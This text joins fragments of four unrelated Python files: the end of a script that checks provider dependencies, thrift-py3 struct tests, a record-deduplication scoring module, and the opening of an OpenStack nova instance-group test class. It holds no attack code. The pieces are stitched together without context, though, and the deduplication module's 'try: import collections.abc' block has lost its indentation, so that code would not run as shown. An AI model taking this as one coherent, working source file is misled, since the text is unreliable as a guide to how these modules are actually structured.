def insert_documentation(deps_dict: Dict[str, List[str]], res: List[str]):
    """Append an RST table of package -> extras (comma-separated provider
    dependencies) to the *res* line list, framed by HEADER and FOOTER."""
    res.extend(HEADER.splitlines(keepends=True))
    for package, deps in deps_dict.items():
        # Left-pad the package name to 27 columns to align the table.
        res.append(f"{package:27}{','.join(deps)}\n")
    res.extend(FOOTER.splitlines(keepends=True))
if __name__ == '__main__':
    print()
    files, provider_dependencies_file_name, documentation_file_name = parse_arguments()
    # Scan every file, accumulating cross-provider dependencies plus
    # info/warning/error messages in the module-level lists.
    num_files = 0
    for file in files:
        check_if_different_provider_used(file)
        num_files += 1
    print(f"Verified {num_files} files.")
    if infos:
        print("\nInformation messages:\n")
        for info in infos:
            print(PREFIX + info)
        print(f"Total: {len(infos)} information messages.")
    if warnings:
        print("\nWarnings!\n")
        for warning in warnings:
            print(PREFIX + warning)
        print(f"Total: {len(warnings)} warnings.")
    if errors:
        print("\nErrors!\n")
        for error in errors:
            print(PREFIX + error)
        print(f"Total: {len(errors)} errors.")
    # Deterministic output: sort providers and de-duplicate their deps.
    unique_sorted_dependencies: Dict[str, List[str]] = {}
    for key in sorted(dependencies.keys()):
        unique_sorted_dependencies[key] = sorted(list(set(dependencies[key])))
    if provider_dependencies_file_name:
        # Dump the dependency map as JSON.
        with open(provider_dependencies_file_name, "w") as providers_file:
            json.dump(unique_sorted_dependencies, providers_file, indent=2)
            providers_file.write("\n")
        print()
        print(f"Written provider dependencies to the file {provider_dependencies_file_name}")
        print()
    if documentation_file_name:
        # Rewrite the section between the START/END markers in the .rst file,
        # keeping everything outside the markers untouched.
        with io.open(documentation_file_name, "r", encoding="utf-8") as documentation_file:
            text = documentation_file.readlines()
        replacing = False
        result: List[str] = []
        for line in text:
            if line.startswith(" .. START PACKAGE DEPENDENCIES HERE"):
                replacing = True
                result.append(line)
                insert_documentation(unique_sorted_dependencies, result)
            if line.startswith(" .. END PACKAGE DEPENDENCIES HERE"):
                replacing = False
            if not replacing:
                result.append(line)
        with io.open(documentation_file_name, "w", encoding="utf-8") as documentation_file:
            documentation_file.write("".join(result))
        print()
        print(f"Written package extras to the file {documentation_file_name}")
        print()
    # Non-zero exit when any file was outside the providers package.
    if errors:
        print()
        print("ERROR! Errors found during verification. Exiting!")
        print()
        sys.exit(1)
    print()
    print("Verification complete! Success!")
    print()
| |
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import math
import unittest
from testing.types import (
Color,
File,
Integers,
Kind,
Nested1,
Nested2,
Nested3,
NonCopyable,
Optionals,
Reserved,
Runtime,
SlowCompare,
UnusedError,
easy,
hard,
numerical,
PrivateCppRefField,
)
from thrift.py3.common import Protocol
from thrift.py3.serializer import deserialize
from thrift.py3.types import Struct
class StructTests(unittest.TestCase):
    """Behavioral tests for thrift-py3 generated structs, unions and errors:
    isset introspection, copying, repr, replace-style calls, runtime type
    checks, reserved-word fields, ordering and nested-field updates."""

    def test_isset_Struct(self) -> None:
        serialized = b'{"name":"/dev/null","type":8}'
        file = deserialize(File, serialized, protocol=Protocol.JSON)
        # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
        # param but got `File`.
        self.assertTrue(Struct.isset(file).type)
        # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
        # param but got `File`.
        self.assertFalse(Struct.isset(file).permissions)
        # required fields are always set
        # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
        # param but got `File`.
        self.assertTrue(Struct.isset(file).name)

        serialized = b'{"name":"/dev/null"}'
        file = deserialize(File, serialized, protocol=Protocol.JSON)
        self.assertEqual(file.type, Kind.REGULAR)
        # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
        # param but got `File`.
        self.assertFalse(Struct.isset(file).type)

    def test_isset_repr(self) -> None:
        serialized = b'{"name":"/dev/null","type":8}'
        file = deserialize(File, serialized, protocol=Protocol.JSON)
        self.assertEqual(
            "Struct.isset(<File>, name=True, permissions=False, type=True)",
            # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for
            # 1st param but got `File`.
            repr(Struct.isset(file)),
        )
        self.assertEqual(
            "Struct.isset(<File>, name=True, permissions=False, type=True)",
            # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for
            # 1st param but got `File`.
            str(Struct.isset(file)),
        )

    def test_isset_Union(self) -> None:
        i = Integers(large=2)
        with self.assertRaises(TypeError):
            # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for
            # 1st param but got `Integers`.
            Struct.isset(i).large

    def test_isset_Error(self) -> None:
        e = UnusedError()
        # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
        # param but got `UnusedError`.
        self.assertFalse(Struct.isset(e).message)

        e = UnusedError(message="ACK")
        # pyre-fixme[6]: Expected `HasIsSet[Variable[thrift.py3.types._T]]` for 1st
        # param but got `UnusedError`.
        self.assertTrue(Struct.isset(e).message)

    def test_copy(self) -> None:
        x = easy(val=1, an_int=Integers(small=300), name="foo", val_list=[1, 2, 3, 4])
        dif_list = copy.copy(x.val_list)
        self.assertEqual(x.val_list, dif_list)
        dif_int = copy.copy(x.an_int)
        self.assertEqual(x.an_int, dif_int)

    def test_hashability(self) -> None:
        hash(easy())

    def test_str(self) -> None:
        self.assertEqual(
            "easy(val=0, val_list=i[], name=None, an_int=Integers(type=EMPTY, value=None))",
            str(easy()),
        )
        self.assertEqual(
            "easy(val=0, val_list=i[], name=None, an_int=Integers(type=EMPTY, value=None))",
            repr(easy()),
        )
        x = easy(val=1, an_int=Integers(small=300), name="foo", val_list=[1, 2, 3, 4])
        self.assertEqual(
            "easy(val=1, val_list=i[1, 2, 3, 4], name='foo', an_int=Integers(type=small, value=300))",
            str(x),
        )
        self.assertEqual(
            "easy(val=1, val_list=i[1, 2, 3, 4], name='foo', an_int=Integers(type=small, value=300))",
            repr(x),
        )

    def test_optional_struct_creation(self) -> None:
        with self.assertRaises(TypeError):
            # pyre-fixme[19]: Expected 0 positional arguments.
            easy(1, [1, 1], "test", Integers(tiny=1))
        easy(val=1, an_int=Integers(small=500))
        with self.assertRaises(TypeError):
            # pyre-fixme[6]: Expected `Optional[str]` for 1st param but got `bytes`.
            easy(name=b"binary")
        # Only Required Fields don't accept None
        easy(val=5, an_int=None)

    def test_required_fields_not_enforced(self) -> None:
        # None is not acceptable as a string
        hard(val=1, val_list=[1, 2], name=None, an_int=Integers(small=1))
        hard(val=1, val_list=[1, 2])

    def test_call_replace(self) -> None:
        x = easy(val=1, an_int=Integers(small=300), name="foo")
        y = x(name="bar")
        self.assertNotEqual(x.name, y.name)
        z = y(an_int=None, val=4)
        self.assertNotEqual(x.an_int, z.an_int)
        self.assertNotEqual(x.val, z.val)
        self.assertIsNone(z.an_int.value)
        self.assertEqual(y.val, x.val)
        self.assertEqual(y.an_int, x.an_int)
        x = easy()
        self.assertIsNotNone(x.val)
        self.assertIsNotNone(x.val_list)
        self.assertIsNone(x.name)
        self.assertIsNotNone(x.an_int)

    def test_call_replace_container(self) -> None:
        x = Optionals(values=["a", "b", "c"])
        z = x(values=["b", "c"])
        self.assertEqual(z.values, ["b", "c"])
        y = z(values=None)
        self.assertIsNone(y.values)

    def test_runtime_checks(self) -> None:
        x = Runtime()
        with self.assertRaises(TypeError):
            x(bool_val=5)
        with self.assertRaises(TypeError):
            # pyre-fixme[6]: Expected `Optional[bool]` for 1st param but got `int`.
            Runtime(bool_val=5)
        with self.assertRaises(TypeError):
            x(enum_val=2)
        with self.assertRaises(TypeError):
            # pyre-fixme[6]: Expected `Optional[Color]` for 1st param but got `int`.
            Runtime(enum_val=2)
        with self.assertRaises(TypeError):
            x(int_list_val=["foo", "bar", "baz"])
        with self.assertRaises(TypeError):
            # pyre-fixme[6]: Expected `Optional[typing.Sequence[int]]` for 1st param
            # but got `List[str]`.
            Runtime(int_list_val=["foo", "bar", "baz"])

    def test_reserved(self) -> None:
        x = Reserved(
            from_="hello",
            nonlocal_=3,
            ok="bye",
            is_cpdef=True,
            move="Qh4xe1",
            inst="foo",
            changes="bar",
        )
        self.assertEqual(x.from_, "hello")
        self.assertEqual(x.nonlocal_, 3)
        self.assertEqual(x.ok, "bye")
        self.assertEqual(x.is_cpdef, True)
        self.assertEqual(x.move, "Qh4xe1")
        self.assertEqual(x.inst, "foo")
        self.assertEqual(x.changes, "bar")

    def test_ordering(self) -> None:
        x = Runtime(bool_val=False, enum_val=Color.red, int_list_val=[64, 128])
        y = x(bool_val=True)
        self.assertLess(x, y)
        self.assertLessEqual(x, y)
        self.assertGreater(y, x)
        self.assertGreaterEqual(y, x)
        # assertEquals is a deprecated alias, removed in Python 3.12.
        self.assertEqual([x, y], sorted([y, x]))

    def test_noncomparable(self) -> None:
        x = SlowCompare(field1="text", field2=10, field3=Color.red)
        y = x(field3=Color.blue)
        x2 = SlowCompare(field1="text", field2=10, field3=Color.red)
        self.assertEqual(x, x2)
        self.assertNotEqual(x, y)

    def test_noncopyable(self) -> None:
        x = NonCopyable(num=123)
        with self.assertRaises(TypeError):
            x(num=1234)
        with self.assertRaises(TypeError):
            copy.copy(x)
        with self.assertRaises(TypeError):
            copy.deepcopy(x)

    def test_init_with_invalid_field(self) -> None:
        with self.assertRaises(TypeError):
            # pyre-ignore[28]: intentionally used a wrong field name "val_lists" for test
            easy(val=1, an_int=Integers(small=300), name="foo", val_lists=[1, 2, 3, 4])

    def test_iterate(self) -> None:
        x = Reserved(
            from_="hello",
            nonlocal_=3,
            ok="bye",
            is_cpdef=True,
            move="Qh4xe1",
            inst="foo",
            changes="bar",
        )
        self.assertEqual(
            list(x),
            [
                ("from_", "hello"),
                ("nonlocal_", 3),
                ("ok", "bye"),
                ("is_cpdef", True),
                ("move", "Qh4xe1"),
                ("inst", "foo"),
                ("changes", "bar"),
            ],
        )

    def test_update_nested_fields(self) -> None:
        n = Nested1(a=Nested2(b=Nested3(c=easy(val=42, name="foo"))))
        n = Struct.update_nested_field(n, {"a.b.c": easy(val=128)})
        self.assertEqual(n.a.b.c.val, 128)

    def test_update_multiple_nested_fields(self) -> None:
        n = Nested1(a=Nested2(b=Nested3(c=easy(val=42, name="foo"))))
        n = Struct.update_nested_field(
            n,
            {
                "a.b.c.name": "bar",
                "a.b.c.val": 256,
            },
        )
        self.assertEqual(n.a.b.c.name, "bar")
        self.assertEqual(n.a.b.c.val, 256)

    def test_update_invalid_nested_fields(self) -> None:
        n = Nested1(a=Nested2(b=Nested3(c=easy(val=42, name="foo"))))
        with self.assertRaises(ValueError):
            Struct.update_nested_field(n, {"": 0})
        with self.assertRaises(ValueError):
            Struct.update_nested_field(n, {"e": 0})
        with self.assertRaises(ValueError):
            Struct.update_nested_field(n, {"a.b.e": 0})
        with self.assertRaises(ValueError):
            Struct.update_nested_field(n, {"a.e.f": 0})

    def test_update_conflicting_nested_fields(self) -> None:
        n = Nested1(a=Nested2(b=Nested3(c=easy(val=42, name="foo"))))
        with self.assertRaises(ValueError):
            n = Struct.update_nested_field(
                n,
                {
                    "a.b.c": easy(val=128),
                    "a.b.c.val": 256,
                },
            )
class NumericalConversionsTests(unittest.TestCase):
    """Tests for numeric handling in thrift-py3 structs: integer overflow
    detection, implicit int-to-float widening, i64 bounds, rejection of
    float-to-int narrowing, and unique_ptr/cpp.ref field access."""
    def test_overflow(self) -> None:
        # Values too large for the declared field widths must raise.
        with self.assertRaises(OverflowError):
            numerical(float_val=5, int_val=2 ** 63 - 1)
        with self.assertRaises(OverflowError):
            numerical(float_val=5, int_val=2, int_list=[5, 2 ** 32])
    def test_int_to_float(self) -> None:
        # Ints are accepted wherever a float is declared.
        x = numerical(int_val=5, float_val=5, float_list=[1, 5, 6])
        x(float_val=10)
        x(float_val=10)
        x(float_list=[6, 7, 8])
    def test_int_to_i64(self) -> None:
        large = 2 ** 63 - 1
        numerical(int_val=5, float_val=5, i64_val=int(large))
        too_large = 2 ** 65 - 1
        with self.assertRaises(OverflowError):
            numerical(int_val=5, float_val=5, i64_val=int(too_large))
    def test_float_to_int_required_field(self) -> None:
        # Floats are never silently truncated to ints.
        with self.assertRaises(TypeError):
            # pyre-fixme[6]: Expected `Optional[int]` for 1st param but got `float`.
            numerical(int_val=math.pi, float_val=math.pi)
    def test_float_to_int_unqualified_field(self) -> None:
        with self.assertRaises(TypeError):
            numerical(
                float_val=math.pi,
                # pyre-fixme[6]: Expected `Optional[int]` for 3rd param but got `float`.
                int_val=math.pi,
            )
    def test_float_to_int_list(self) -> None:
        with self.assertRaises(TypeError):
            numerical(
                int_val=5,
                float_val=math.pi,
                # pyre-fixme[6]: Expected `Optional[typing.Sequence[int]]` for 3rd
                # param but got `List[float]`.
                int_list=[math.pi, math.e],
            )
    def test_private_cpp_ref_field(self) -> None:
        # Fields behind a C++ reference may be None; guard before reading.
        x = PrivateCppRefField(
            field1=easy(val=1, name="11"),
            field2=easy(val=2, name="22"),
            field3=easy(val=3, name="33"),
        )
        field1 = x.field1
        field2 = x.field2
        field3 = x.field3
        if field1:
            self.assertEqual(field1.val, 1)
            self.assertEqual(field1.name, "11")
        if field2:
            self.assertEqual(field2.val, 2)
            self.assertEqual(field2.name, "22")
        if field3:
            self.assertEqual(field3.val, 3)
            self.assertEqual(field3.name, "33")
| |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from builtins import range, next, zip, map
from future.utils import viewvalues
import sys
# Python 2 / Python 3 compatibility shims: single set of names for
# text/bytes types, shelve keys and arbitrary-precision ints.
# NOTE(review): the string comparison works here ('2.x' < '3' is True,
# '3.x' < '3' is False) but sys.version_info would be the robust check.
if sys.version < '3':
    text_type = unicode
    binary_type = str
    # shelve keys must be byte strings on Python 2
    shelve_key = lambda x: x.encode()
    int_type = long
else:
    text_type = str
    binary_type = bytes
    unicode = str
    # shelve keys are native str on Python 3
    shelve_key = lambda x: x
    int_type = int
import itertools
import time
import tempfile
import os
import operator
import random
import collections
import warnings
import shutil
import shelve
import pickle
import functools
try:
import collections.abc as collections_abc
except ImportError:
import collections as collections_abc
import numpy
class ChildProcessError(Exception):
    """Raised when a scoring worker or reducer process reports a failure.

    NOTE(review): shadows the Python 3 builtin of the same name; kept for
    backward compatibility with existing callers.
    """
class BlockingError(Exception):
    """Raised when blocking produced no candidate record pairs to score."""
def randomPairs(n_records, sample_size):
    """
    Return random combinations of indices for a square matrix of size n
    records. For a discussion of how this works see
    http://stackoverflow.com/a/14839010/98080
    """
    n_combinations = int(n_records * (n_records - 1) / 2)

    if sample_size >= n_combinations:
        # Fewer possible pairs than requested: enumerate every pair.
        picks = numpy.arange(n_combinations, dtype='uint')
    else:
        try:
            picks = numpy.array(random.sample(range(n_combinations), sample_size),
                                dtype='uint')
        except OverflowError:
            # Population too big for random.sample; fall back to sampling
            # with replacement.
            return randomPairsWithReplacement(n_records, sample_size)

    # Invert the triangular-number indexing to recover (row, col) with
    # row < col from each flat combination index.
    b = 1 - 2 * n_records
    row = numpy.floor((-b - 2 * numpy.sqrt(2 * (n_combinations - picks) + 0.25)) / 2).astype('uint')
    col = numpy.rint(picks + row * (b + row + 2) / 2 + 1).astype('uint')

    return zip(row, col)
def randomPairsMatch(n_records_A, n_records_B, sample_size):
    """
    Return random combinations of indices for record list A and B
    """
    n_total = int(n_records_A * n_records_B)

    if sample_size >= n_total:
        # Requested at least as many pairs as exist: take them all.
        flat_indices = numpy.arange(n_total)
    else:
        flat_indices = numpy.array(random.sample(range(n_total), sample_size),
                                   dtype=int)

    # Convert flat indices into (index in A, index in B) coordinates.
    row, col = numpy.unravel_index(flat_indices, (n_records_A, n_records_B))
    return zip(row, col)
def randomPairsWithReplacement(n_records, sample_size):
    """Sample `sample_size` index pairs with replacement.

    Used as a fallback when the pair population is too large to sample
    without replacement.
    """
    # If the population is very large relative to the sample size,
    # we'll get very few duplicates by chance anyway.
    warnings.warn("There may be duplicates in the sample")

    try:
        indices = numpy.random.randint(n_records, size=sample_size * 2)
    except (OverflowError, ValueError):
        # n_records exceeds what randint accepts: restrict the population.
        max_int = numpy.iinfo('int').max
        warnings.warn("Asked to sample pairs from %d records, will only sample pairs from first %d records" % (n_records, max_int))
        indices = numpy.random.randint(max_int, size=sample_size * 2)

    indices = indices.reshape((-1, 2))
    indices.sort(axis=1)

    return [(a.item(), b.item()) for a, b in indices]
class ScoreDupes(object) :
    """Map worker: pulls chunks of candidate record pairs off a queue,
    scores them with the classifier, and pushes the results (as paths to
    memory-mapped files) onto a score queue.

    The worker stops when it receives a `None` poison pill, and always
    puts a final `None` on the score queue so the reducer can count
    finished workers.
    """
    def __init__(self, data_model, classifier, threshold) :
        self.data_model = data_model        # provides distances() over record pairs
        self.classifier = classifier        # provides predict_proba()
        self.threshold = threshold          # minimum score to keep a pair
        self.score_queue = None
    def __call__(self, records_queue, score_queue) :
        """Consume record-pair chunks until a None poison pill arrives.

        Exceptions are forwarded over the queue (so the parent sees them)
        and then re-raised to kill this worker.
        """
        self.score_queue = score_queue
        while True :
            record_pairs = records_queue.get()
            if record_pairs is None :
                break
            try :
                filtered_pairs = self.fieldDistance(record_pairs)
                if filtered_pairs is not None :
                    score_queue.put(filtered_pairs)
            except Exception as e :
                # Forward the exception to the reducer, then re-raise here.
                score_queue.put(e)
                raise
        score_queue.put(None)
    def fieldDistance(self, record_pairs) :
        """Score a chunk of record pairs.

        Pairs whose smaller-id sets overlap have already been compared in
        an earlier block and are skipped.  Returns (file_path, dtype) of a
        memmap holding pairs scoring above the threshold, or None when
        nothing qualifies.
        """
        ids = []
        records = []
        for record_pair in record_pairs :
            ((id_1, record_1, smaller_ids_1),
             (id_2, record_2, smaller_ids_2)) = record_pair
            # Disjoint smaller-id sets => this pair hasn't been seen before.
            if smaller_ids_1.isdisjoint(smaller_ids_2) :
                ids.append((id_1, id_2))
                records.append((record_1, record_2))
        if records :
            distances = self.data_model.distances(records)
            # Probability of the positive (duplicate) class.
            scores = self.classifier.predict_proba(distances)[:,-1]
            mask = scores > self.threshold
            if mask.any():
                id_type = sniff_id_type(ids)
                ids = numpy.array(ids, dtype=id_type)
                dtype = numpy.dtype([('pairs', id_type, 2),
                                     ('score', 'f4', 1)])
                # Spill results to a temp file so only the path crosses the
                # process boundary, not the array itself.
                temp_file, file_path = tempfile.mkstemp()
                os.close(temp_file)
                scored_pairs = numpy.memmap(file_path,
                                            shape=numpy.count_nonzero(mask),
                                            dtype=dtype)
                scored_pairs['pairs'] = ids[mask]
                scored_pairs['score'] = scores[mask]
                return file_path, dtype
def mergeScores(score_queue, result_queue, stop_signals):
    """Reduce worker: concatenate scored-pair chunks into one memmap file.

    Consumes (file_path, dtype) chunks produced by ScoreDupes workers until
    ``stop_signals`` poison pills (None) have been seen.  Exceptions coming
    over the queue are forwarded to ``result_queue`` and then raised to kill
    this process.

    Puts (file_path, dtype, n_rows) on ``result_queue``, or None when no
    pairs scored above the threshold.
    """
    fd, file_path = tempfile.mkstemp()
    os.close(fd)

    seen_signals = 0
    end = 0
    while seen_signals < stop_signals:
        score_chunk = score_queue.get()

        if isinstance(score_chunk, Exception):
            # Forward the worker's exception to the consumer, then raise it
            # here too.  (BUG FIX: a bare `raise` outside an except block is
            # a RuntimeError on Python 3 — raise the forwarded exception.)
            result_queue.put(score_chunk)
            raise score_chunk
        elif score_chunk is None:
            seen_signals += 1
        else:
            score_file, dtype = score_chunk
            score_chunk = numpy.memmap(score_file, mode='r', dtype=dtype)
            chunk_size = len(score_chunk)

            # Append the chunk at the current end of the merged memmap.
            fp = numpy.memmap(file_path, dtype=dtype,
                              offset=(end * dtype.itemsize),
                              shape=(chunk_size, ))
            fp[:chunk_size] = score_chunk
            end += chunk_size

            del score_chunk
            os.remove(score_file)

    if end:
        result_queue.put((file_path, dtype, end))
    else:
        result_queue.put(None)
def scoreDuplicates(records, data_model, classifier, num_cores=1, threshold=0):
    """Score blocked record pairs in parallel.

    Fans `records` (an iterable of candidate pair chunks) out to
    ScoreDupes map workers, merges their results with mergeScores, and
    returns a structured numpy array (memmap) with 'pairs' and 'score'
    fields.

    Raises BlockingError when no records were blocked together, and
    ChildProcessError when a worker died with an exception.
    """
    if num_cores < 2:
        # Thread-backed stand-ins: no real processes for a single core.
        from multiprocessing.dummy import Process, Queue
        SimpleQueue = Queue
    else:
        from .backport import Process, SimpleQueue, Queue

    first, records = peek(records)
    if first is None:
        raise BlockingError("No records have been blocked together. "
                            "Is the data you are trying to match like "
                            "the data you trained on?")

    record_pairs_queue = Queue(2)
    score_queue = SimpleQueue()
    result_queue = SimpleQueue()

    n_map_processes = max(num_cores, 1)
    score_records = ScoreDupes(data_model, classifier, threshold)
    map_processes = [Process(target=score_records,
                             args=(record_pairs_queue,
                                   score_queue))
                     for _ in range(n_map_processes)]
    [process.start() for process in map_processes]

    reduce_process = Process(target=mergeScores,
                             args=(score_queue,
                                   result_queue,
                                   n_map_processes))
    reduce_process.start()

    fillQueue(record_pairs_queue, records, n_map_processes)

    result = result_queue.get()
    if isinstance(result, Exception):
        raise ChildProcessError

    if result:
        scored_pairs_file, dtype, size = result
        scored_pairs = numpy.memmap(scored_pairs_file,
                                    dtype=dtype,
                                    shape=(size,))
    else:
        # BUG FIX: `dtype` was unbound on this branch (NameError when no
        # pairs scored above threshold).  Return a well-formed empty array
        # with a generic pair type instead.
        dtype = numpy.dtype([('pairs', object, 2),
                             ('score', 'f4')])
        scored_pairs = numpy.array([], dtype=dtype)

    reduce_process.join()
    [process.join() for process in map_processes]

    return scored_pairs
def fillQueue(queue, iterable, stop_signals):
    """Feed `iterable` into `queue` in adaptively sized chunks, then put
    `stop_signals` None poison pills so each consumer knows to stop.

    The chunk size is tuned on the fly: it grows or shrinks by a constant
    factor, reversing direction whenever throughput drops.
    """
    iterable = iter(iterable)
    chunk_size = 10000
    upper_bound = 7000000  # this number worked, but is unprincipled
    multiplier = 1.1

    # BUG FIX: time.clock() was removed in Python 3.8.  Use perf_counter
    # when available, falling back to clock only on old interpreters.
    timer = getattr(time, 'perf_counter', None) or time.clock

    # initial values
    i = 0
    n_records = 0
    t0 = timer()
    last_rate = 10000

    while True:
        chunk = tuple(itertools.islice(iterable, int(chunk_size)))
        if chunk:
            queue.put(chunk)
            del chunk

            n_records += chunk_size
            i += 1
            # NOTE(review): this recalibrates on 9 of every 10 chunks;
            # `i % 10 == 0` may have been intended — preserved as-is.
            if i % 10:
                time_delta = max(timer() - t0, 0.0001)
                current_rate = n_records / time_delta
                # chunk_size is always either growing or shrinking, if
                # the shrinking led to a faster rate, keep
                # shrinking. Same with growing. If the rate decreased,
                # reverse directions
                if current_rate < last_rate:
                    multiplier = 1 / multiplier
                chunk_size = min(max(chunk_size * multiplier, 1), upper_bound)
                last_rate = current_rate
                n_records = 0
                t0 = timer()
        else:
            # put poison pills in queue to tell scorers that they are
            # done
            [queue.put(None) for _ in range(stop_signals)]
            break
class ScoreGazette(object):
    """Callable that scores one block of candidate record pairs and
    returns a structured ('pairs', 'score') array for pairs above the
    threshold."""

    def __init__(self, data_model, classifier, threshold):
        self.data_model = data_model
        self.classifier = classifier
        self.threshold = threshold

    def __call__(self, block):
        """Score every pair in `block`; keep those above the threshold."""
        pair_ids = []
        pair_records = []
        for (id_1, record_1, _), (id_2, record_2, _) in block:
            pair_ids.append((id_1, id_2))
            pair_records.append((record_1, record_2))

        distances = self.data_model.distances(pair_records)
        # Probability of the positive (duplicate) class.
        scores = self.classifier.predict_proba(distances)[:, -1]
        keep = scores > self.threshold

        id_type = sniff_id_type(pair_ids)
        id_array = numpy.array(pair_ids, dtype=id_type)

        dtype = numpy.dtype([('pairs', id_type, 2),
                             ('score', 'f4', 1)])
        scored_pairs = numpy.empty(shape=numpy.count_nonzero(keep),
                                   dtype=dtype)
        scored_pairs['pairs'] = id_array[keep]
        scored_pairs['score'] = scores[keep]

        return scored_pairs
def scoreGazette(records, data_model, classifier, num_cores=1, threshold=0):
    """Yield one scored-pair array per block of candidate records.

    Uses a plain map on a single core, or a process pool's unordered
    imap otherwise.  Raises ValueError when `records` is empty.
    """
    if num_cores < 2:
        imap = map
    else:
        from .backport import Pool
        n_map_processes = max(num_cores, 1)
        pool = Pool(processes=n_map_processes)
        imap = functools.partial(pool.imap_unordered, chunksize=1)

    first, records = peek(records)
    if first is None:
        raise ValueError("No records to match")

    scorer = ScoreGazette(data_model, classifier, threshold)
    for scored_pairs in imap(scorer, records):
        yield scored_pairs
def peek(records):
    """Return (first_item, stream) without losing the first item.

    `records` may be an iterator or a plain iterable.  Returns
    (None, records) when it is empty; otherwise `stream` re-yields the
    peeked item followed by the rest.
    """
    try:
        record = next(records)
    except TypeError as err:
        # A plain iterable, not an iterator: wrap it and retry.
        if "not an iterator" not in str(err):
            raise
        try:
            records = iter(records)
            record = next(records)
        except StopIteration:
            return None, records
    except StopIteration:
        return None, records

    return record, itertools.chain([record], records)
def isIndexed(data, offset):
    """True if `data` is keyed by the contiguous integers
    offset .. offset + len(data) - 1."""
    expected_keys = range(offset, offset + len(data))
    return all(key in data for key in expected_keys)
def index(data, offset=0):
    """Return `data` re-keyed with contiguous integer keys starting at
    `offset`; returns `data` unchanged when it is already indexed that
    way."""
    if isIndexed(data, offset):
        return data

    renumbered = dict(zip(itertools.count(offset),
                          viewvalues(data)))
    return renumbered
def iunzip(iterable, internal_length):  # pragma: no cover
    """Lazily invert zip: split an iterable of n-tuples into n iterators.

    Equivalent to zip(*iterable) but without materializing the input;
    mostly used for large sequences.
    """
    _tmp, iterable = itertools.tee(iterable, 2)
    copies = itertools.tee(iterable, internal_length)
    return (map(operator.itemgetter(pos), it)
            for pos, it in enumerate(copies))
def Enumerator(start=0, initial=()):
    """Return a defaultdict mapping each previously unseen key to the next
    integer in sequence, beginning at `start`.

    `initial` seeds the mapping with existing (key, number) pairs.
    """
    counter = itertools.count(start)
    try:  # Python 2: counters expose .next
        advance = counter.next
    except AttributeError:  # Python 3: .__next__
        advance = counter.__next__
    return collections.defaultdict(advance, initial)
class TempShelve(collections_abc.MutableMapping):
    """A MutableMapping backed by an on-disk shelve in a temp directory.

    Keys pass through the module-level ``shelve_key`` shim so text keys
    work on both Python 2 and 3.  Call close() to delete the backing
    files.
    """

    def __init__(self, filename):
        self.path = tempfile.mkdtemp()
        self.shelve = shelve.open(self.path + filename, 'n',
                                  protocol=pickle.HIGHEST_PROTOCOL)

    def close(self):
        # Close the shelve, then remove the whole temp directory.
        self.shelve.close()
        shutil.rmtree(self.path)

    def __getitem__(self, key):
        return self.shelve[shelve_key(key)]

    def __setitem__(self, key, value):
        self.shelve[shelve_key(key)] = value

    def __delitem__(self, key):
        del self.shelve[shelve_key(key)]

    def __contains__(self, key):
        return shelve_key(key) in self.shelve

    def __iter__(self):
        return iter(self.shelve)

    def __len__(self):
        return len(self.shelve)

    def values(self):
        return viewvalues(self.shelve)
def sniff_id_type(ids):
    """Infer a numpy-friendly dtype for record ids from the first id.

    String ids map to a fixed-width unicode type (up to 256 chars);
    anything else must be castable to int.
    """
    example = ids[0][0]

    example_type = type(example)
    if example_type is binary_type or example_type is text_type:
        return (unicode, 256)

    int_type(example)  # make sure we can cast to int
    return int_type
| |
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from nova.compute import flavors
from nova import context
from nova import db
from nova import exception
from nova.objects import instance_group
from nova import test
from nova.tests.objects import test_objects
from nova.tests import utils as tests_utils
class _TestInstanceGroupObjects(test.TestCase):
    """Shared tests for the InstanceGroup versioned object.

    Exercises create/read/update/destroy and list operations against the
    nova DB API, comparing object-layer results with direct db calls.
    Concrete subclasses bind these tests to the local or remote (RPC)
    object backend.
    """
    def setUp(self):
        super(_TestInstanceGroupObjects, self).setUp()
        self.user_id = 'fake_user'
        self.project_id = 'fake_project'
        self.context = context.RequestContext(self.user_id, self.project_id)
    def _get_default_values(self):
        # Minimal values dict accepted by db.instance_group_create().
        return {'name': 'fake_name',
                'user_id': self.user_id,
                'project_id': self.project_id}
    def _create_instance_group(self, context, values, policies=None,
                               members=None):
        return db.instance_group_create(context, values, policies=policies,
                                        members=members)
    def test_get_by_uuid(self):
        values = self._get_default_values()
        policies = ['policy1', 'policy2']
        members = ['instance_id1', 'instance_id2']
        db_result = self._create_instance_group(self.context, values,
                                                policies=policies,
                                                members=members)
        obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                              db_result.uuid)
        self.assertEqual(obj_result.members, members)
        self.assertEqual(obj_result.policies, policies)
    def test_refresh(self):
        values = self._get_default_values()
        db_result = self._create_instance_group(self.context, values)
        obj_result = instance_group.InstanceGroup.get_by_uuid(self.context,
                                                              db_result.uuid)
        self.assertEqual(obj_result.name, 'fake_name')
        values = {'name': 'new_name', 'user_id': 'new_user',
                  'project_id': 'new_project'}
        db.instance_group_update(self.context, db_result['uuid'],
                                 values)
        obj_result.refresh()
        self.assertEqual(obj_result.name, 'new_name')
